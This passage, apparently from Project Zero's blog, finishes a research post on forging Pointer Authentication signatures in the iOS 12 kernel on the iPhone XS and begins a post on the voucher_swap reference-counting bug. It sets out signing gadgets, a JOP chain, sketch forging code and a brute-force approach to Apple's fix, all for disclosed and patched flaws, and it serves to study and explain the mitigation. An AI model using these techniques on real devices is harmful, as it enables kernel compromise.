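    k.hi ^= arch_reg.hi;
    return k;
}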
While I couldn't figure out the true implementation, I decided to assume the most robust design for the rest of my research: that the true keys are random and stored in the SoC itself. That way, any bypass strategy I found would be all but guaranteed to work regardless of the actual implementation.

PAC EL-impersonation

With zero leads for systematic weaknesses, I decided it was time to investigate PAC signing gadgets.
The very first PACIA instruction occurs in a function I identified as vm_shared_region_slide_page(), and specifically as an inlined copy of vm_shared_region_slide_page_v3(). This function is present in the XNU sources, and has the following interesting comment in its main loop:
uint8_t* rebaseLocation = page_content;
uint64_t delta = page_entry;
do {
    rebaseLocation += delta;
    uint64_t value;
    memcpy(&value, rebaseLocation, sizeof(value));
    delta = ( (value & 0x3FF8000000000000) >> 51) * sizeof(uint64_t);
    // A pointer is one of :
    // {
    //     uint64_t pointerValue : 51;
    //     uint64_t offsetToNextPointer : 11;
    //     uint64_t isBind : 1 = 0;
    //     uint64_t authenticated : 1 = 0;
    // }
    // {
    //     uint32_t offsetFromSharedCacheBase;
    //     uint16_t diversityData;
    //     uint16_t hasAddressDiversity : 1;
    //     uint16_t hasDKey : 1;
    //     uint16_t hasBKey : 1;
    //     uint16_t offsetToNextPointer : 11;
    //     uint16_t isBind : 1;
    //     uint16_t authenticated : 1 = 1;
    // }
    bool isBind = (value & (1ULL << 62)) == 1;
    if (isBind) {
        return KERN_FAILURE;
    }
   bool isAuthenticated = (value & (1ULL << 63)) != 0;
    if (isAuthenticated) {
        // The new value for a rebase is the low 32-bits of the threaded value
        // plus the slide.
        value = (value & 0xFFFFFFFF) + slide_amount;
        // Add in the offset from the mach_header
        const uint64_t value_add = s_info->value_add;
        value += value_add;
    } else {
        // The new value for a rebase is the low 51-bits of the threaded value
        // plus the slide. Regular pointer which needs to fit in 51-bits of
        // value. C++ RTTI uses the top bit, so we'll allow the whole top-byte
        // and the bottom 43-bits to be fit in to 51-bits.
        ...
    }
    memcpy(rebaseLocation, &value, sizeof(value));
} while (delta != 0);
The part about the "pointer" containing authenticated, hasBKey, and hasDKey bits suggests that this code is dealing with authenticated pointers, although all the code that actually performs PAC operations has been removed from the public sources. Furthermore, the other comment about C++ RTTI suggests that this code is specifically for rebasing userspace code. This means that the kernel would have to be aware of, and maybe perform PAC operations on, userspace pointers.
Looking at the decompilation of this loop in IDA, we can see that there are many operations not present in the public source code:
slide_amount = si->slide;
offset = uservaddr - rebaseLocation;
do
{
    rebaseLocation += delta;
    value = *(uint64_t *)rebaseLocation;
    delta = (value >> 48) & 0x3FF8;
    if ( value & 0x8000000000000000 )       // isAuthenticated
    {
        value = slide_amount + (uint32_t)value + slide_info_entry->value_add;
        context = (value >> 32) & 0xFFFF;   // diversityData
        if ( value & 0x1000000000000 )      // hasAddressDiversity
            context = (offset + rebaseLocation) & 0xFFFFFFFFFFFF
                    | (context << 48);
        if ( si->UNKNOWN_FIELD && !(BootArgs->bootFlags & 0x4000000000000000) )
        {
            daif = _ReadStatusReg(ARM64_SYSREG(3, 3, 4, 2, 1));// DAIF
            if ( !(daif & 0x80) )
                __asm { MSR             #6, #3 }
            _WriteStatusReg(S3_4_C15_C0_4,
                _ReadStatusReg(S3_4_C15_C0_4) & 0xFFFFFFFFFFFFFFFB);
            __isb(0xFu);
            key_bits = (value >> 49) & 3;
            switch ( key_bits )
            {
                case 0:
                    value = ptrauth_sign...(value, ptrauth_key_asia, &context);
                    break;
                case 1:
                    value = ptrauth_sign...(value, ptrauth_key_asib, &context);
                    break;
                case 2:
                    value = ptrauth_sign...(value, ptrauth_key_asda, &context);
                    break;
                case 3:
                    value = ptrauth_sign...(value, ptrauth_key_asdb, &context);
                    break;
            }
            _WriteStatusReg(S3_4_C15_C0_4, _ReadStatusReg(S3_4_C15_C0_4) | 4);
            __isb(0xFu);
            ml_set_interrupts_enabled(~(daif >> 7) & 1);
        }
    }
    else
    {
        ...
    }
    memmove(rebaseLocation, &value, 8);
}
while ( delta );
It appears that the kernel is attempting to sign pointers on behalf of userspace. This is interesting because, as previously discussed, the A12 breaks cross-EL symmetry, which should mean that the kernel's signatures on userspace pointers will be invalid in userspace.
It's unlikely that this freshly-introduced code is broken, so there must be some mechanism by which the kernel instructs the CPU to sign with the userspace keys instead. Searching for other instances of PAC* instructions like this, a pattern begins to emerge: whenever the kernel signs pointers on behalf of userspace, it wraps the PAC instructions by clearing and setting a bit in the S3_4_C15_C0_4 system register:
MRS         X8, #4, c15, c0, #4 ; S3_4_C15_C0_4
AND         X8, X8, #0xFFFFFFFFFFFFFFFB
MSR         #4, c15, c0, #4, X8 ; S3_4_C15_C0_4
ISB
...         ;; PAC stuff for userspace
MRS         X8, #4, c15, c0, #4 ; S3_4_C15_C0_4
ORR         X8, X8, #4
MSR         #4, c15, c0, #4, X8 ; S3_4_C15_C0_4
ISB
Also, kernel code that sets/clears bit 0x4 of S3_4_C15_C0_4 is usually accompanied by code that disables interrupts and checks bit 0x4000000000000000 of BootArgs->bootFlags, as we see in the excerpt from vm_shared_region_slide_page_v3() above.
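Rendered as C, the whole pattern presumably amounts to something like the following reconstructed sketch; the helper name is mine, and the meaning of bit 0x4 is inferred below rather than documented anywhere:

#include <ptrauth.h>

// Speculative reconstruction, not actual XNU source: sign a pointer on
// behalf of userspace by temporarily selecting the EL0 PAC keys.
static uint64_t sign_for_userspace(uint64_t value, uint64_t context) {
    boolean_t ints = ml_set_interrupts_enabled(FALSE);  // no preemption while EL0 keys are live
    uint64_t reg = __builtin_arm_rsr64("S3_4_C15_C0_4");
    __builtin_arm_wsr64("S3_4_C15_C0_4", reg & ~4ULL);  // clear bit 0x4: use the EL0 keys
    __builtin_arm_isb(0xF);
    value = (uint64_t)ptrauth_sign_unauthenticated((void *)value,
            ptrauth_key_asia, (void *)context);
    __builtin_arm_wsr64("S3_4_C15_C0_4", reg | 4ULL);   // set bit 0x4: back to the EL1 keys
    __builtin_arm_isb(0xF);
    ml_set_interrupts_enabled(ints);
    return value;
}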
We can infer that bit 0x4 of S3_4_C15_C0_4 controls whether PAC* instructions in the kernel use the EL0 keys or the EL1 keys: when this bit is set the kernel keys are used, otherwise the userspace keys are used. It makes sense that you'd need to disable interrupts while this bit is cleared, since otherwise the arrival of an interrupt may cause other kernel code to execute while the EL0 PAC keys are still in use, causing PAC validation failures that would panic the kernel.

PAC-enable bits in SCTLR_EL1

Another thing I noticed while investigating system registers was that previously reserved bits of SCTLR_EL1 were now being used to enable/disable PAC instructions for certain keys.
While looking at the exception vector for syscall entry, Lel0_synchronous_vector_64, I noticed some additional code referencing bootFlags and setting certain bits of SCTLR_EL1 that are marked as reserved in the ARM standard:
ADRP        X0, #const_boot_args@PAGE
ADD         X0, X0, #const_boot_args@PAGEOFF
LDR         X0, [X0,#(const_boot_args.bootFlags - 0xFFFFFFF0077A21B8)]
AND         X0, X0, #0x8000000000000000
CBNZ        X0, loc_FFFFFFF0079B3320
MRS         X0, #0, c1, c0, #0                  ;; SCTLR_EL1
TBNZ        W0, #0x1F, loc_FFFFFFF0079B3320
ORR         X0, X0, #0x80000000                 ;; set bit 31
ORR         X0, X0, #0x8000000                  ;; set bit 27
ORR         X0, X0, #0x2000                     ;; set bit 13
MSR         #0, c1, c0, #0, X0                  ;; SCTLR_EL1
Also, these bits are conditionally cleared on exception return:
TBNZ        W1, #2, loc_FFFFFFF0079B3AE8        ;; SPSR_EL1.M[3:0] & 0x4
...
LDR         X2, [X2,#thread.field_460]
CBZ         X2, loc_FFFFFFF0079B3AE8
...
MRS         X0, #0, c1, c0, #0                  ;; SCTLR_EL1
AND         X0, X0, #0xFFFFFFFF7FFFFFFF         ;; clear bit 31
AND         X0, X0, #0xFFFFFFFFF7FFFFFF         ;; clear bit 27
AND         X0, X0, #0xFFFFFFFFFFFFDFFF         ;; clear bit 13
MSR         #0, c1, c0, #0, X0                  ;; SCTLR_EL1
While these bits are documented as reserved (with value 0) by ARM, I did find a reference to one of them in the XNU 4903.221.2 sources, in osfmk/arm64/proc_reg.h:
// 13           PACDB_ENABLED            AddPACDB and AuthDB functions enabled
#define SCTLR_PACDB_ENABLED             (1 << 13)
This suggested that bit 13 at least is related to enabling PAC for the DB key. Since the only SCTLR_EL1 bits that are both (a) not mentioned in the file and (b) not set automatically via SCTLR_RESERVED are 31, 30, and 27, I speculated that these bits controlled the other PAC keys. (Presumably, leaving the reference to SCTLR_PACDB_ENABLED in the code was an oversight.) My guess is that bit 31 controls PACIA, bit 30 controls PACIB, bit 27 controls PACDA, and bit 13 controls PACDB.
To test this theory, I executed the following sequence of PAC instructions in the debugger, both before and after setting the field at offset 0x460 of the current thread:
pacia  x0, x1
pacib  x2, x3
pacda  x4, x5
pacdb  x6, x7
Before executing these instructions, I set each register Xn to the value 0x11223300 | n. Here's the result before setting field_460; the PACs are visible in the upper bits of each signed register:
x0 = 0x001d498011223300    # PACIA
x1 = 0x0000000011223301
x2 = 0x0035778011223302    # PACIB
x3 = 0x0000000011223303
x4 = 0x0062860011223304    # PACDA
x5 = 0x0000000011223305
x6 = 0x001e6c8011223306    # PACDB
x7 = 0x0000000011223307
And here's the result after:
x0 = 0x0000000011223300    # PACIA
x1 = 0x0000000011223301
x2 = 0x0035778011223302    # PACIB
x3 = 0x0000000011223303
x4 = 0x0000000011223304    # PACDA
x5 = 0x0000000011223305
x6 = 0x0000000011223306    # PACDB
x7 = 0x0000000011223307
This seems to confirm our theory: before setting field_460, the PAC instructions worked as expected, but after setting field_460, all except PACIB have been effectively turned into NOPs. Using this fact for exploitation is tricky, since overwriting field_460 in a kernel thread does not seem to disable PAC in that thread due to additional checks. Nonetheless, the existence of these PAC-enable bits in SCTLR_EL1 was interesting in its own right.

The (non-)existence of signing gadgets

At this point, since we have no systematic weaknesses against Apple's more robust design, we're looking for a signing gadget usable only via read/write. That means we're looking for a sequence of code that will read a pointer from memory, sign it, and write it back to memory. But we can't yet call arbitrary kernel addresses, so we also need to ensure that this code path is actually triggerable, either during the course of normal kernel operation, or by using our iokit_user_client_trap() call primitive to call a kernel function to which there already exists a PACIZA'd pointer.
Apple has clearly tried to scrub the kernelcache of any obvious signing gadgets. All occurrences of the PACIA instruction are either unusable or wrapped by code that switches to the userspace PAC keys (via S3_4_C15_C0_4), so there's no way we can convince the kernel to perform a PACIA forgery using only read/write.
This left just PACIZA. While there were many more occurrences of the PACIZA instruction, most of them were useless since the result wasn't written to memory. Additionally, gadgets that actually did load and store the pointer were almost always preceded by AUTIA, which would fail if the pointer we were signing didn't already have a valid PAC:
LDR         X10, [X9,#0x30]!
CBNZ        X19, loc_FFFFFFF007EBD330
CBZ         X10, loc_FFFFFFF007EBD330
MOV         X19, #0
MOV         X11, X9
MOVK        X11, #0x14EF,LSL#48
AUTIA       X10, X11
PACIZA      X10
STR         X10, [X9]
Thus, it appeared I was out of luck.

The fourth weakness

After giving up on signing gadgets and pursuing a few other dead ends, I eventually wondered: what would actually happen if PACIZA were used to sign an invalid pointer produced by a failed AUTIA? I'd assumed that such a pointer would be useless, but I decided to check the ARM pseudocode to find out.
To my surprise, the standard revealed a funny interaction between AUTIA and PACIZA. When AUTIA finds that an authenticated pointer's PAC doesn't match the expected value, it corrupts the pointer by inserting an error code into the pointer's extension bits:
// Auth()
// ======
// Restores the upper bits of the address to be all zeros or all ones (based on
// the value of bit[55]) and computes and checks the pointer authentication
// code. If the check passes, then the restored address is returned. If the
// check fails, the second-top and third-top bits of the extension bits in the
// pointer authentication code field are corrupted to ensure that accessing the
// address will give a translation fault.
bits(64) Auth(bits(64) ptr, bits(64) modifier, bits(128) K, boolean data,
              bit keynumber)
    bits(64) PAC;
    bits(64) result;
    bits(64) original_ptr;
    bits(2) error_code;
    bits(64) extfield;
    // Reconstruct the extension field used of adding the PAC to the pointer
    boolean tbi = CalculateTBI(ptr, data);
    integer bottom_PAC_bit = CalculateBottomPACBit(ptr<55>);
    extfield = Replicate(ptr<55>, 64);
    if tbi then
        ...
    else
        original_ptr = extfield<64-bottom_PAC_bit-1:0>:ptr<bottom_PAC_bit-1:0>;
    PAC = ComputePAC(original_ptr, modifier, K<127:64>, K<63:0>);
    // Check pointer authentication code
    if tbi then
        ...
    else
        if ((PAC<54:bottom_PAC_bit> == ptr<54:bottom_PAC_bit>) &&
            (PAC<63:56> == ptr<63:56>)) then
            result = original_ptr;
        else
            error_code = keynumber:NOT(keynumber);
            result = original_ptr<63>:error_code:original_ptr<60:0>;
    return result;
Meanwhile, when PACIZA is adding a PAC to a pointer, it actually signs the pointer with corrected extension bits, and then corrupts the PAC if the extension bits were originally invalid. From the pseudocode for AddPAC() above:
   ext_ptr = extfield<(64-bottom_PAC_bit)-1:0>:ptr<bottom_PAC_bit-1:0>;
PAC = ComputePAC(ext_ptr, modifier, K<127:64>, K<63:0>);
// Check if the ptr has good extension bits and corrupt the pointer
// authentication code if not;
if !IsZero(ptr<top_bit:bottom_PAC_bit>)
        && !IsOnes(ptr<top_bit:bottom_PAC_bit>) then
    PAC<top_bit-1> = NOT(PAC<top_bit-1>);
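In other words, the only damage done to a PAC* forgery on an AUT*-corrupted pointer is a single, predictable bit-flip. A minimal sketch of the correction, assuming 64-bit kernel pointers for which top_bit-1 works out to bit 62:

// The AUTIA-then-PACIZA gadget hands back PACIZA(ptr) with PAC bit 62
// inverted, because the failed AUTIA left error bits in the pointer's
// extension bits. Flipping it back yields the valid signature.
static uint64_t fix_forged_pac(uint64_t forged) {
    return forged ^ (1ULL << 62);
}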
Critically, PAC* instructions will corrupt the PAC of a pointer with invalid extension bits by flipping a single bit of the PAC. While this will certainly invalidate the PAC, it also means that the true PAC can be reconstructed if we can read out the value of a PAC*-forgery on a pointer produced by an AUT* instruction! So sequences like the one above that consist of an AUTIA followed by a PACIZA can be used as signing gadgets even if we don't have a validly signed pointer to begin with: we just have to flip a single bit in the forged PAC.

A complete A-key forgery strategy for 16C50

With the existence of a single PACIZA signing gadget, we can begin our construction of a complete forgery strategy for the A keys on A12 devices running build 16C50.

Stage 1: PACIZA-forgery

A bit of sleuthing reveals that the gadget we found is part of the function sysctl_unregister_oid(), which is responsible for unregistering a sysctl_oid struct from the global sysctl tree. (Once again, this function does not have any PAC-related code in the public sources, but these operations are present on PAC-enabled devices.) Here's a listing of the relevant parts of this function from IDA:
void sysctl_unregister_oid(sysctl_oid *oidp)
{
    sysctl_oid *removed_oidp = NULL;
    sysctl_oid *old_oidp = NULL;
    BOOL have_old_oidp;
    void **handler_field;
    void *handler;
    uint64_t context;
    ...
    if ( !(oidp->oid_kind & 0x400000) )         // Don't enter this if
    {
        ...
    }
    if ( oidp->oid_version != 1 )               // Don't enter this if
    {
        ...
    }
    sysctl_oid *first_sibling = oidp->oid_parent->first;
    if ( first_sibling == oidp )                // Enter this if
    {
        removed_oidp = NULL;
        old_oidp = oidp;
        oidp->oid_parent->first = old_oidp->oid_link;
        have_old_oidp = 1;
    }
    else
    {
        ...
    }
    handler_field = &old_oidp->oid_handler;
    handler = old_oidp->oid_handler;
    if ( removed_oidp || !handler )             // Take the else
    {
        ...
    }
    else
    {
        removed_oidp = NULL;
        context = (0x14EF << 48) | ((uint64_t)handler_field & 0xFFFFFFFFFFFF);
        *handler_field = ptrauth_sign_unauthenticated(
                ptrauth_auth_function(handler, ptrauth_key_asia, &context),
                ptrauth_key_asia,
                0);
        ...
    }
    ...
}
If we can get this function called with a crafted sysctl_oid that causes the indicated path to be taken, we should be able to forge arbitrary PACIZA pointers.
There aren't any existing global PACIZA'd pointers to this function, so we can't call it directly using our iokit_user_client_trap() primitive, but as luck would have it, there are several global PACIZA'd function pointers that themselves call into it. This is because several kernel extensions register sysctls that they need to unregister before they're unloaded; these kexts often have a module termination function that calls sysctl_unregister_oid(), and the kmod_info struct describing the kext contains a PACIZA'd pointer to the module termination function.
The best candidate I could find was l2tp_domain_module_stop(), which is part of the com.apple.nke.l2tp kext. This function will perform some deinitialization work before calling sysctl_unregister_oid() on the global sysctl__net_ppp_l2tp object. Thus, we can PACIZA-sign an arbitrary pointer by overwriting the contents of sysctl__net_ppp_l2tp, calling l2tp_domain_module_stop() via the existing global PACIZA'd pointer, and then reading out sysctl__net_ppp_l2tp's oid_handler field and flipping bit 62.

Stage 2: PACIA/PACDA forgery

While this lets us PACIZA-forge any pointer we want, it'd be nice to be able to perform PACIA/PACDA forgeries as well, since then we could implement the full bypass described in the section "Finding an entry point for kernel code execution". To do that, I next looked into whether our PACIZA primitive could turn any of the PACIA instructions in the kernelcache into viable signing gadgets.
The most likely candidate for both PACIA and PACDA was an unknown function sub_FFFFFFF007B66C48, which contains the following instruction sequence:
MRS         X9, #4, c15, c0, #4 ; S3_4_C15_C0_4
AND         X9, X9, #0xFFFFFFFFFFFFFFFB
MSR         #4, c15, c0, #4, X9 ; S3_4_C15_C0_4
ISB
LDR         X9, [X2,#0x100]
CBZ         X9, loc_FFFFFFF007B66D24
MOV         W10, #0x7481
PACIA       X9, X10
STR         X9, [X2,#0x100]
...
LDR         X9, [X2,#0xF8]
CBZ         X9, loc_FFFFFFF007B66D54
MOV         W10, #0xCBED
PACDA       X9, X10
STR         X9, [X2,#0xF8]
...
MRS         X9, #4, c15, c0, #4 ; S3_4_C15_C0_4
ORR         X9, X9, #4
MSR         #4, c15, c0, #4, X9 ; S3_4_C15_C0_4
ISB
...
PACIBSP
STP         X20, X19, [SP,#var_20]!
...         ;; Function body (mostly harmless)
LDP         X20, X19, [SP+0x20+var_20],#0x20
AUTIBSP
MOV         W0, #0
RET
What makes sub_FFFFFFF007B66C48 a good candidate is that the PACIA/PACDA instructions occur before the stack frame is set up. Ordinarily, calling into the middle of a function will cause problems when the function returns, since the function's epilogue will tear down a frame that was never set up. But since this function's stack frame is set up after our desired entry points, we can use our kernel call primitive to jump directly to these instructions without causing any problems.
Of course, we still have another issue: the PACIA and PACDA instructions use registers X9 and X10, while our kernel call primitive based on iokit_user_client_trap() only gives us control of registers X1 through X6. We'll need to figure out how to get the values we want into the appropriate registers.
In fact, we already found a solution to this very problem earlier: JOP gadgets.
Searching through the kernelcache, just three kexts seem to hold the vast majority of non-PAC'd indirect branches: FairPlayIOKit, LSKDIOKit, and LSKDIOKitMSE. These kexts even stand out in IDA's navigator bar as islands of red in a sea of blue, since IDA cannot create functions out of many of the instructions in these kexts:
[Image: IDA's navigator bar, showing the obfuscated kexts as islands of red (unanalyzed instructions) in a sea of blue]
It seems that these kexts use some sort of obfuscation to hide control flow and make reverse engineering more difficult. Many jumps in this code are performed indirectly through registers. Unfortunately, in this case the obfuscation actually makes our job as attackers easier, since it gives us a plethora of useful JOP gadgets not protected by PAC.
For our specific use case, we have control of PC and X1 through X6, and we're trying to set X2 to some writable memory region, X9 to the pointer we want to sign, and X10 to the signing context, before jumping to the signing gadget. I eventually settled on executing the following JOP program to accomplish this:
X1 = MOV_X10_X3__BR_X6
X2 = KERNEL_BUFFER
X3 = CONTEXT
X4 = POINTER
X5 = MOV_X9_X0__BR_X1
X6 = PACIA_X9_X10__STR_X9_X2_100
MOV         X0, X4
BR          X5
MOV         X9, X0
BR          X1
MOV         X10, X3
BR          X6
PACIA       X9, X10
STR         X9, [X2,#0x100]
...
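Driving this chain through the call primitive might look roughly like the sketch below, where kcall() is the assumed 7-argument primitive built on iokit_user_client_trap(), kread64() is the read primitive, and the uppercase names are placeholder gadget and buffer addresses recovered by reversing:

// Hedged sketch: produce a PACIA forgery via the JOP chain above.
static uint64_t forge_pacia(uint64_t pointer, uint64_t context) {
    kcall(MOV_X0_X4__BR_X5,                 // PC: entry gadget
          MOV_X10_X3__BR_X6,                // X1
          KERNEL_BUFFER,                    // X2: writable kernel scratch memory
          context,                          // X3
          pointer,                          // X4
          MOV_X9_X0__BR_X1,                 // X5
          PACIA_X9_X10__STR_X9_X2_100);     // X6
    // The signing gadget stored PACIA(pointer, context) at offset 0x100.
    return kread64(KERNEL_BUFFER + 0x100);
}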
And with that, we now have a complete bypass strategy that allows us to forge arbitrary PAC signatures using the A keys.

Timeline

After sharing my original kernel read/write exploit on December 18, 2018, I reported the proof-of-concept PAC bypass built on top of voucher_swap on December 30. This POC could produce arbitrary A-key PAC forgeries and call arbitrary kernel functions with 7 arguments, just like on non-PAC devices.
Apple quickly responded suggesting that the latest iOS 12.1.3 beta, build 16D5032a, should mitigate the issue. As this build also fixed the voucher_swap bug, I couldn't test this directly, but I did inspect the kernelcache manually and found that Apple had mitigated the sysctl_unregister_oid() gadget used to produce the first PACIZA forgery.
This build was released on December 19, near the beginning of my research into PAC and long before I reported the bypass to Apple. Thus, like the case with the voucher_swap bug, I suspect that another researcher found and reported this issue first.

Apple's fix

In order to fix the sysctl_unregister_oid() gadget (and other AUTIA-PACIA gadgets), Apple has added a few instructions to ensure that if the AUTIA fails, then the resulting invalid pointer will be used instead of the result of PACIZA:
LDR         X10, [X9,#0x30]!            ;; X10 = old_oidp->oid_handler
CBNZ        X19, loc_FFFFFFF007EBD4A0
CBZ         X10, loc_FFFFFFF007EBD4A0
MOV         X19, #0
MOV         X11, X9                     ;; X11 = &old_oidp->oid_handler
MOVK        X11, #0x14EF,LSL#48         ;; X11 = 14EF`&oid_handler
MOV         X12, X10                    ;; X12 = oid_handler
AUTIA       X12, X11                    ;; X12 = AUTIA(handler, 14EF`&handler)
XPACI       X10                         ;; X10 = XPAC(handler)
CMP         X12, X10
PACIZA      X10                         ;; X10 = PACIZA(XPAC(handler))
CSEL        X10, X10, X12, EQ           ;; X10 = (PAC_valid ? PACIZA : AUTIA)
STR         X10, [X9]
With this change, we can no longer PACIZA-forge a pointer unless we already have a PACIA forgery with a specific context.

Brute-force strategies

While this does mitigate the fast, straightforward strategy outlined above, with enough time it is still susceptible to brute forcing. Now, I couldn't test this explicitly without an exploit for iOS 12.1.3, but I was able to simulate how long it might take using my exploit on iOS 12.1.2.
The problem is that even though we don't have an existing PACIA-forgery for the pointer we want to PACIZA-forge, we can use our kernel call primitive to execute this gadget repeatedly with different guesses for the valid PAC. Unlike most other instances in which authenticated pointers are used, guessing incorrectly here won't actually trigger a panic: we can just read out the result to see whether we guessed correctly (in which case the oid_handler field will have a PAC added) or incorrectly (in which case oid_handler will look like the result of a failed AUTIA).
Looking back at the list of PAC'd pointers generated in my very first experiment in the subsection "Observing runtime behavior", I compared the extension bits of all the pointers to determine that the PAC was masked into the bits 0xff7fff8000000000. This means the A12 is using a 24-bit PAC, or about 16 million possibilities.
In my experiments, I found that invoking l2tp_domain_module_stop() and l2tp_domain_module_start() 256 times took about 13.2 milliseconds. Thus, exhaustively checking all 16 million possible PACs should take around 15 minutes. And unless there were other changes I didn't notice, once a single PACIZA forgery is produced, the rest of the A-key bypass strategy should still be possible.
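To make the brute force concrete: each guess just needs to be scattered over the PAC bits of the candidate pointer before invoking the hardened gadget. A sketch, using the mask measured above:

#include <stdint.h>

#define PAC_MASK 0xff7fff8000000000ULL      // the 24 PAC bits on the A12

// Stamp a 24-bit guess into the PAC bits of a pointer. With the right
// guess, the gadget's AUTIA succeeds and the CSEL stores a PACIZA'd
// pointer; with a wrong guess, we read back an AUTIA failure value and
// move on to the next one.
static uint64_t stamp_pac_guess(uint64_t ptr, uint32_t guess) {
    uint64_t pac = 0;
    int bit = 0;
    for (int i = 0; i < 64; i++)
        if (PAC_MASK & (1ULL << i))
            pac |= (uint64_t)((guess >> bit++) & 1) << i;
    return (ptr & ~PAC_MASK) | pac;
}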
(Initializing/deinitializing the module more than about 4096 times started to produce noticeable slowdowns; I didn't identify the source of this slowness, but I do suspect that with effort it should be possible to work around it.)

Conclusion

In this post we put Apple's implementation of Pointer Authentication on the A12 SoC used in the iPhone XS under the microscope, describing observed behavior, theorizing about how deviations from the ARM reference might be implemented under the hood, and analyzing the system for weaknesses that would allow a kernel attacker with read/write capabilities to forge PACs for arbitrary pointers. This analysis culminated with a complete bypass strategy and proof-of-concept implementation that allows the attacker to perform arbitrary A-key forgeries on an iPhone XS running iOS 12.1.2. Such a bypass is sufficient for achieving arbitrary kernel code execution through JOP. This strategy was partially mitigated with the release of iOS 12.1.3 beta 16D5032a, although there are indications that it might still be possible to bypass the mitigation via a brute-force approach.
Despite these flaws, PAC remains a solid and worthwhile mitigation. Apple's hardening of PAC in the A12 SoC, which was clearly designed to protect against kernel attackers with read/write, meant that I did not find a systematic break in the design and had to rely on signing gadgets, which are easy to patch via software. As with any complex new mitigation, loopholes are not uncommon in the first few iterations. However, given the fragility of the current bypass technique (relying on, among other things, the single IOUserClient class that allows us to overwrite its IOExternalTrap, one of a very small number of usable PACIZA gadgets, and a handful of non-PAC'd JOP gadgets introduced by obfuscation), I believe it's possible for Apple to harden their implementation to the point that strong forgery bypasses become rare.
Furthermore, PAC shows promise as a tool to make data-only kernel attacks trickier and less powerful. For example, I could see Apple adding something akin to a __security_critical attribute that enables PAC for C pointers that are especially prone to being hijacked during exploits, such as ipc_port's ip_kobject field. Such a mitigation wouldn't end any bug classes, since sophisticated attackers could find other ways of leveraging vulnerabilities into kernel read/write primitives, but it would raise the bar and make simple exploit strategies like those used in voucher_swap much harder (and hopefully less reliable) to pull off.

voucher_swap: Exploiting MIG reference counting in iOS 12

29 January, 2019 - 19:15
Posted by Brandon Azad, Project Zero
In this post I'll describe how I discovered and exploited CVE-2019-6225, a MIG reference counting vulnerability in XNU's task_swap_mach_voucher() function. We'll see how to exploit this bug on iOS 12.1.2 to build a fake kernel task port, giving us the ability to read and write arbitrary kernel memory. (This bug was independently discovered by @S0rryMybad.) In a later post, we'll look at how to use this bug as a starting point to analyze and bypass Apple's implementation of ARMv8.3 Pointer Authentication (PAC) on A12 devices like the iPhone XS.

A curious discovery

MIG is a tool that generates Mach message parsing code, and vulnerabilities resulting from violating MIG semantics are nothing new: for example, Ian Beer's async_wake exploited an issue where IOSurfaceRootUserClient would over-deallocate a Mach port managed by MIG semantics on iOS 11.1.2.
Most prior MIG-related issues have been the result of MIG service routines not obeying semantics around object lifetimes and ownership. Usually, the MIG ownership rules are expressed as follows:
  1. If a MIG service routine returns success, then it took ownership of all resources passed in.
  2. If a MIG service routine returns failure, then it took ownership of none of the resources passed in.

Unfortunately, as we'll see, this description doesn't cover the full complexity of kernel objects managed by MIG, which can lead to unexpected bugs.
The journey started while investigating a reference count overflow in semaphore_destroy(), in which an error path through the function left the semaphore_t object with an additional reference. While looking at the autogenerated MIG function _Xsemaphore_destroy() that wraps semaphore_destroy(), I noticed that this function seems to obey non-conventional semantics.
Here's the relevant code from _Xsemaphore_destroy():
    task = convert_port_to_task(In0P->Head.msgh_request_port);

    OutP->RetCode = semaphore_destroy(task,
            convert_port_to_semaphore(In0P->semaphore.name));
    task_deallocate(task);
#if __MigKernelSpecificCode
    if (OutP->RetCode != KERN_SUCCESS) {
        MIG_RETURN_ERROR(OutP, OutP->RetCode);
    }

    if (IP_VALID((ipc_port_t)In0P->semaphore.name))
        ipc_port_release_send((ipc_port_t)In0P->semaphore.name);
#endif /* __MigKernelSpecificCode */
The function convert_port_to_semaphore() takes a Mach port and produces a reference on the underlying semaphore object without consuming the reference on the port. If we assume that a correct implementation of the above code doesn't leak or consume extra references, then we can conclude the following intended semantics for semaphore_destroy():
  1. On success, semaphore_destroy() should consume the semaphore reference.
  2. On failure, semaphore_destroy() should still consume the semaphore reference.

Thus, semaphore_destroy() doesn't seem to follow the traditional rules of MIG semantics: a correct implementation always takes ownership of the semaphore object, regardless of whether the service routine returns success or failure.
This of course raises the question: what are the full rules governing MIG semantics? And are there any instances of code violating these other MIG rules?

A bad swap

Not long into my investigation into extended MIG semantics, I discovered the function task_swap_mach_voucher(). This is the MIG definition from osfmk/mach/task.defs:
routine task_swap_mach_voucher(
                task            : task_t;
                new_voucher     : ipc_voucher_t;
        inout   old_voucher     : ipc_voucher_t);
And here's the relevant code from _Xtask_swap_mach_voucher(), the autogenerated MIG wrapper:
mig_internal novalue _Xtask_swap_mach_voucher
        (mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP)
{
...
    kern_return_t RetCode;
    task_t task;
    ipc_voucher_t new_voucher;
    ipc_voucher_t old_voucher;
...
    task = convert_port_to_task(In0P->Head.msgh_request_port);

    new_voucher = convert_port_to_voucher(In0P->new_voucher.name);

    old_voucher = convert_port_to_voucher(In0P->old_voucher.name);

    RetCode = task_swap_mach_voucher(task, new_voucher, &old_voucher);

    ipc_voucher_release(new_voucher);

    task_deallocate(task);

    if (RetCode != KERN_SUCCESS) {
        MIG_RETURN_ERROR(OutP, RetCode);
    }
...
    if (IP_VALID((ipc_port_t)In0P->old_voucher.name))
        ipc_port_release_send((ipc_port_t)In0P->old_voucher.name);

    if (IP_VALID((ipc_port_t)In0P->new_voucher.name))
        ipc_port_release_send((ipc_port_t)In0P->new_voucher.name);
...
    OutP->old_voucher.name = (mach_port_t)convert_voucher_to_port(old_voucher);

    OutP->Head.msgh_bits |= MACH_MSGH_BITS_COMPLEX;
    OutP->Head.msgh_size = (mach_msg_size_t)(sizeof(Reply));
    OutP->msgh_body.msgh_descriptor_count = 1;
}
Once again, assuming that a correct implementation doesn't leak or consume extra references, we can infer the following intended semantics for task_swap_mach_voucher():
  1. task_swap_mach_voucher() does not hold a reference on new_voucher; the new_voucher reference is borrowed and should not be consumed.
  2. task_swap_mach_voucher() holds a reference on the input value of old_voucher that it should consume.
  3. On failure, the output value of old_voucher should not hold any references on the pointed-to voucher object.
  4. On success, the output value of old_voucher holds a voucher reference donated from task_swap_mach_voucher() to _Xtask_swap_mach_voucher() that the latter consumes via convert_voucher_to_port().

With these semantics in mind, we can compare against the actual implementation. Here's the code from XNU 4903.221.2's osfmk/kern/task.c, presumably a placeholder implementation:
kern_return_t
task_swap_mach_voucher(
        task_t          task,
        ipc_voucher_t   new_voucher,
        ipc_voucher_t   *in_out_old_voucher)
{
    if (TASK_NULL == task)
        return KERN_INVALID_TASK;

    *in_out_old_voucher = new_voucher;
